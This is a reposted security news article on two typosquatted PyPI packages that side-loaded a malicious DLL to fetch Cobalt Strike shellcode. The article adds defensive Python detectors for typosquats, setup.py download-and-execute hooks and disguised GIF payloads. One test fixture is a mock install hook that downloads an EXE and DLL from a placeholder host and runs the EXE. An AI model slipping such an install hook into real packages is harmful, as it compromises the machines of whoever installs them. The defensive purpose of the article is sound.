New Malicious PyPI Packages Found Using a Covert Side-Loading Tactic

admin, 21 February 2024, 10:54:42


Cybersecurity researchers have discovered two malicious packages on the Python Package Index (PyPI) repository that were found leveraging a technique called DLL side-loading to circumvent detection by security software and run malicious code.

The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded 537 and 166 times, respectively, before they were taken down.

"The latest discovery is an example of DLL sideloading executed by an open-source package that suggests the scope of software supply chain threats is expanding," ReversingLabs researcher Petar Kirhmajer said in a report shared with The Hacker News.

The name NP6 is notable as it refers to a legitimate marketing automation solution made by ChapsVision. In particular, the fake packages are typosquats of NP6HelperHttp and NP6HelperConfig, which are helper tools published by one of ChapsVision's employees to PyPI.

In other words, the goal is to trick developers searching for NP6HelperHttp and NP6HelperConfig into downloading their rogue counterparts.
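
The two rogue names are the legitimate name with a short suffix bolted on (NP6HelperHttp + "test", NP6HelperHttp + "er"), which is a different shape from the classic dropped-letter typo. The following is an added example, not code from the ReversingLabs report or from ChapsVision: a pre-install check that flags requested package names sitting close to a list of names the organization actually uses. The LEGIT_NAMES list is an assumption built from the names quoted in this article plus two common packages; in practice it would be the organization's allow-list or an internal mirror's index.

```python
"""Flag requested package names that look like typosquats of known-good names.

Added example (not from the report). LEGIT_NAMES is an assumed allow-list.
"""


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute), compared case-insensitively."""
    a, b = a.lower(), b.lower()
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


# Assumed allow-list: the two real ChapsVision helpers named in the article,
# plus two well-known packages so the check has something not to flag.
LEGIT_NAMES = ["NP6HelperHttp", "NP6HelperConfig", "requests", "numpy"]


def typosquat_candidates(name, legit=LEGIT_NAMES, max_distance=2, max_suffix=4):
    """Return (legit_name, reason) pairs that `name` may be impersonating.

    Two heuristics cover the cases described above:
      * small edit distance: dropped, swapped or appended characters
        ("NP6HelperHttp" -> "NP6HelperHttper" is distance 2)
      * a legitimate name used verbatim as a prefix with a short suffix
        ("NP6HelperHttp" -> "NP6HelperHttptest")
    An exact match is the real package and returns no candidates.
    """
    hits = []
    n = name.lower()
    for legit_name in legit:
        l = legit_name.lower()
        if n == l:
            return []
        d = levenshtein(n, l)
        if d <= max_distance:
            hits.append((legit_name, f"edit distance {d}"))
        elif n.startswith(l) and 0 < len(n) - len(l) <= max_suffix:
            hits.append((legit_name, f"prefix match, suffix '{name[len(legit_name):]}'"))
    return hits


if __name__ == "__main__":
    import sys
    for requested in sys.argv[1:]:
        for legit_name, reason in typosquat_candidates(requested):
            print(f"{requested}: possible typosquat of {legit_name} ({reason})")
```

Run it over the names in a requirements file before `pip install` (`python check.py $(cut -d= -f1 requirements.txt)`); anything it prints deserves a manual look at the PyPI project page, the uploader, and the package's setup.py.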

Contained within the two libraries is a setup.py script designed to download two files: a genuine executable from Beijing-based Kingsoft Corporation ("ComServer.exe") that is vulnerable to DLL side-loading, and the malicious DLL to be side-loaded ("dgdeskband64.dll").
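
Because setup.py is executed by pip at install time, a download-and-run sequence like the one described above can be caught statically before anything runs. The following is an added example, not code from the packages or from the report: it parses a setup.py with Python's `ast` module and flags install hooks, download calls, URLs pointing at native binaries, and process execution. The embedded SAMPLE_SETUP_PY is constructed to mirror the behaviour the article describes; its URL host and directory are placeholders, not the real indicators, and the file names are the two quoted above.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour.

Added example (not from the report or the malicious packages). SAMPLE_SETUP_PY
is a constructed stand-in: example.invalid is a placeholder host.
"""
import ast

SAMPLE_SETUP_PY = '''
import os, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        base = os.path.join(os.getenv("APPDATA", "."), "helper")
        os.makedirs(base, exist_ok=True)
        urllib.request.urlretrieve("http://example.invalid/ComServer.exe", os.path.join(base, "ComServer.exe"))
        urllib.request.urlretrieve("http://example.invalid/dgdeskband64.dll", os.path.join(base, "dgdeskband64.dll"))
        os.system(os.path.join(base, "ComServer.exe"))

setup(name="np6helperhttptest", version="0.1", cmdclass={"install": PostInstall})
'''

NATIVE_EXT = (".exe", ".dll", ".scr")
EXEC_CALLS = {"os.system", "os.startfile", "os.popen"}
INSTALL_HOOK_BASES = ("install", "develop", "build_py", "egg_info")


def _callee(node: ast.Call) -> str:
    """Dotted name of a call target ('urllib.request.urlretrieve', 'os.system'), or ''."""
    f = node.func
    if isinstance(f, ast.Attribute):
        parts = [f.attr]
        while isinstance(f.value, ast.Attribute):
            f = f.value
            parts.append(f.attr)
        if isinstance(f.value, ast.Name):
            parts.append(f.value.id)
        return ".".join(reversed(parts))
    return f.id if isinstance(f, ast.Name) else ""


def _base_name(node) -> str:
    return node.attr if isinstance(node, ast.Attribute) else getattr(node, "id", "")


def scan_setup_py(source: str):
    """Return (kind, lineno, detail) findings, sorted by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            callee = _callee(node)
            if callee.startswith(("urllib.request.", "requests.")):
                findings.append(("download", node.lineno, callee))
            elif callee.startswith("subprocess.") or callee in EXEC_CALLS:
                findings.append(("execute", node.lineno, callee))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            v = node.value.lower()
            if v.startswith(("http://", "https://")) and v.endswith(NATIVE_EXT):
                findings.append(("native-url", node.lineno, node.value))
        elif isinstance(node, ast.ClassDef):
            # Subclassing a setuptools command is how code gets run by `pip install`.
            if any(_base_name(b).endswith(INSTALL_HOOK_BASES) for b in node.bases):
                findings.append(("install-hook", node.lineno, node.name))
    return sorted(findings, key=lambda f: f[1])


def risk_level(findings) -> str:
    """'block' when the package both downloads and executes; 'review' for any single signal."""
    kinds = {k for k, _, _ in findings}
    if {"download", "execute"} <= kinds:
        return "block"
    return "review" if kinds else "clean"


if __name__ == "__main__":
    for kind, line, detail in scan_setup_py(SAMPLE_SETUP_PY):
        print(f"line {line:>3}  {kind:<13} {detail}")
    print("verdict:", risk_level(scan_setup_py(SAMPLE_SETUP_PY)))
```

The check is deliberately heuristic: it looks at static call names, so an attacker who builds the callee at runtime (`getattr(__import__("os"), "system")`) will slip past it, and the `install-hook` signal alone is common in benign packages. It is meant as a cheap gate in front of a download, not a replacement for running the install in a sandbox.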

In side-loading the DLL, the aim is to avoid detection of the malicious code, as observed previously in the case of an npm package called aabquerys that also leveraged the same technique to execute code capable of deploying a remote access trojan.

The DLL, for its part, reaches out to an attacker-controlled domain ("us.archive-ubuntu[.]top") to fetch a GIF file that, in reality, is a piece of shellcode for a Cobalt Strike Beacon, a post-exploitation toolkit used for red teaming.
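
A payload served as a ".gif" that is really shellcode is cheap to spot at a proxy or in a sandbox: the declared type and the first bytes of the body do not agree. The following is an added example, not code from the report, of that content check. All byte strings are constructed; the filler bytes stand in for shellcode and are not a stager, and the URLs use a placeholder host rather than the real attacker domain.

```python
"""Detect downloads whose bytes contradict their claimed type.

Added example (not from the report). Sample bodies and URLs are constructed.
"""

MAGIC = [
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"MZ", "pe"),        # Windows EXE/DLL
    (b"\x7fELF", "elf"),
]
CONTENT_TYPES = {"image/gif": "gif", "image/png": "png", "image/jpeg": "jpeg"}
EXTENSIONS = {"gif": "gif", "png": "png", "jpg": "jpeg", "jpeg": "jpeg", "exe": "pe", "dll": "pe"}


def sniff(body: bytes) -> str:
    """Identify a body by magic bytes; 'unknown' if none match."""
    for sig, kind in MAGIC:
        if body.startswith(sig):
            return kind
    return "unknown"


def validate_download(url: str, content_type: str, body: bytes):
    """Return mismatch reasons for one HTTP response; an empty list means it is what it claims."""
    reasons = []
    sniffed = sniff(body)

    claimed = CONTENT_TYPES.get(content_type.split(";")[0].strip().lower())
    if claimed and claimed != sniffed:
        reasons.append(f"Content-Type {content_type} but bytes look like {sniffed}")

    name = url.split("?")[0].rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    ext_kind = EXTENSIONS.get(ext)
    if ext_kind and ext_kind != sniffed:
        reasons.append(f"URL extension .{ext} but bytes look like {sniffed}")

    # A forged 6-byte header is enough to fool magic sniffing alone, so also
    # require the GIF trailer byte (0x3B) that every complete GIF ends with.
    if sniffed == "gif" and not body.endswith(b"\x3b"):
        reasons.append("GIF header present but no 0x3B trailer: truncated or header-only disguise")
    return reasons


# Constructed samples.
REAL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04\x01"
            b"\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
FILLER = bytes(range(0x90, 0xd0))          # arbitrary bytes standing in for shellcode
DISGUISED = b"GIF89a" + FILLER              # forged header, no trailer
PE_STUB = b"MZ" + b"\x00" * 62              # just enough to look like a PE

if __name__ == "__main__":
    for url, ctype, body in [
        ("http://example.invalid/pixel.gif", "image/gif", REAL_GIF),
        ("http://example.invalid/beacon.gif", "image/gif", FILLER),
        ("http://example.invalid/beacon.gif", "image/gif", DISGUISED),
        ("http://example.invalid/ComServer.exe", "application/octet-stream", PE_STUB),
    ]:
        print(url, validate_download(url, ctype, body) or "ok")
```

Where a proxy already inspects images, the same logic belongs in the sandbox that executes the installed package: a process that spawns from a freshly downloaded EXE and fetches a "GIF" it never renders is the behaviour to alert on, regardless of whether the bytes happen to pass this check.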

There is evidence to suggest that the packages are part of a wider campaign that involves the distribution of similar executables that are susceptible to DLL side-loading.

"Development organizations need to be aware of the threats related to supply chain security and open-source package repositories," security researcher Karlo Zanki said.

"Even if they are not using open-source package repositories, that doesn't mean that threat actors won't abuse them to impersonate companies and their software products and tools."

Originally published on the WeChat public account 知机安全: New Malicious PyPI Packages Found Using a Covert Side-Loading Tactic

Posted by admin on 21 February 2024, 10:54:42. When reposting, please keep the link to this article (CN-SEC 中文网, with thanks to the original author): https://cn-sec.com/archives/2511643.html
